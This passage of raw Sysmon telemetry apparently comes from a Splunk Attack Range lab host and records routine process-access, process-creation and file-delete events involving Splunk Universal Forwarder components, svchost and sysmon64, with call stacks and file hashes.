Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000810491Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:26.328{0C1E0330-F87A-60EB-E679-00000000D001}1700C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000810534Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:27.718{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F87B-60EB-E879-00000000D001}3332C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810533Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:27.718{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810532Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:08:27.718{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810531Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:27.718{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810530Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:08:27.718{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810529Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:27.718{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810528Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:08:27.718{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810527Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:27.718{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810526Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:08:27.702{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810525Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:27.702{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810524Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:08:27.702{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F87B-60EB-E879-00000000D001}3332C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000810523Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:27.702{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F87B-60EB-E879-00000000D001}3332C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000810522Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:27.703{0C1E0330-F87B-60EB-E879-00000000D001}3332C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000810521Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:27.577{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E3C2797D897E9FD4511D04CB79895C0B,SHA256=18419AEA7C9EE39585D4D7172D0B11D9F60E175F8933F50801ABF72B4781CD76,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054932Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:27.173{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA2355B40E3C27C6005E95B448B74E75,SHA256=7692305888485F6D07B1D062A6B0BDE60611B1175C037EBA585A6C6101F775C6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000810520Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:27.187{0C1E0330-F87B-60EB-E779-00000000D001}1980212C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810519Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:27.030{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F87B-60EB-E779-00000000D001}1980C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810518Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:27.030{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810517Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:08:27.030{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810516Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:27.030{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810515Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:08:27.030{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810514Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:27.030{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810513Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:08:27.030{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810512Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:27.030{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810511Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:08:27.030{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810510Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 